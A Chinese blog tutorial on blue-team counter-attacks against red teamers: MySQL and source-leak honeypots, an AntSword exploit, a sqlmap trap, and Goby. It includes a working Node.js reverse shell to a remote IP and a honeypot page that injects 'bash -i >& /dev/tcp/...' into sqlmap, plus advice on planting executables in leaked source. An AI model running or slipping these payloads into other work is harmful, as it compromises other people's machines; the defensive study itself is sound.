当前位置: 首页 > news >正文

【蓝队技能】【溯源反制】反打红队-蜜罐工具反制

蓝队技能


反打红队-蜜罐&工具反制

  • 蓝队技能
  • 总结
  • 前言
  • 一、Mysql蜜罐反打
  • 二、源码泄露蜜罐反打
  • 三、蚁剑反打
  • 四、sqlmap反打
  • 五、goby反打


总结

在这里插入图片描述


前言

本文汇总了网络安全攻防中的溯源反制策略,包括MYSQL蜜罐、源码泄漏蜜罐、AntSword反制、SQLMap诱捕及Goby反制。通过实战案例,展示蓝队如何巧妙应对红队攻击,提升防御能力。适合网络安全从业者、渗透测试人员及兴趣爱好者参考。


一、Mysql蜜罐反打

蜜罐地址
python2安装

该蜜罐需要python2启动,在安装过程遇到问题,请看python2安装解决方案

mysql反制核心研究

二、源码泄露蜜罐反打

  1. 创建空文件夹,并使用IDEA打开
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述

如下OK应该是第14步
在这里插入图片描述
关闭IDEA,然后重新打开test文件夹,发现运行了计算器

在这里插入图片描述

很容易联想到,如果我有一套源码,按照如上操作方式,把可执行文件放在源码中,是不是可以上线CS了

蜜罐

三、蚁剑反打

前提: 低版本
在这里插入图片描述
在这里插入图片描述

上图的base64编码为如下代码的base64编码

var net = require("net"), sh = require("child_process").exec("cmd.exe");
var client = new net.Socket();
client.connect(xx, "xx.xx.xx.xx", function()  {client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});
  • xx:反弹端口
  • xxxx:反弹IP地址
    在这里插入图片描述
    在这里插入图片描述

四、sqlmap反打

ping "`ls`" : 显示当前目录下的文件
sqlmap -u "http://47.94.xxx.xxx/test.html?id=aaa&b=`XXX`":会执行XXX命令

我们的目的就是让红队使用(sqlmap -u “http://192.168.189.142/1.html?id=aaa&b=bash -i >& /dev/tcp/115.159.72.226/2333 0>&1”)来进行sql注入,然后就是反弹shell到我们指定的服务器,构造的注入页面代码如下:

<!--1.html页面内容 服务器是Linux -->
<html>
<head><meta charset="utf-8">  <title> A sqlmap honeypot demo</title>
</head>
<body><input>search the user</input>   <!--创建一个空白表单--><form action="username.html" method="post" enctype="text/plain"><!--创建一个隐藏的表单--><input type='hidden' name='name' value="id=aaa&b=`bash -i >& /dev/tcp/115.159.72.226/2333 0>&1`"/>	<!--创建一个按钮,提交表单内容--><input type="submit" value='提交'></form>
</body>
</html>

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

五、goby反打

goby反打详解

对红队反打比较感兴趣可以看如下文章,总结的非常全
反打大佬文章



http://www.mrgr.cn/news/64993.html

相关文章:

  • [spring源码]spring推断构造方法
  • 【十九周】文献阅读:图像识别的深度残差学习
  • 基于vue3和elementPlus的el-tree组件,实现树结构穿梭框,支持数据回显和懒加载
  • 正向代理模块
  • 重塑未来,开源AI数字人系统引领个性化语音新纪元!AigcPanel v0.03开启公测
  • Git - 两种方式撤销已提交到远端仓库的记录并删除提交记录
  • SpringBoot集成ELK收集日志管理
  • PyQt5入门级超详细教程中篇
  • 【论文笔记】Dense Connector for MLLMs
  • 引起what(): basic_string::_M_replace_aux问题的一个原因以及解决方法
  • Mysql开发规范
  • Java项目实战II基于Spring Boot的文理医院预约挂号系统的设计与实现(开发文档+数据库+源码)
  • nfs作业
  • 目录的简介和rest api规范
  • 组织架构图
  • *网课记录*
  • Cocos使用精灵组件显示相机内容
  • qt管理系统框架(好看界面)
  • 初知C++:继承
  • dns主从服务器的配置
  • 几行命令教你快速安装并配置GitLab
  • 29.3 准备工作,编写配置文件,解析配置,校验正则,设置log
  • Fluent Editor 富文本开源2个月的总结:增加格式刷、截屏、TypeScript 类型声明等新特性
  • 面试题整理 4
  • 深入理解Transformer中的位置编码
  • 斩!JavaScript语法进阶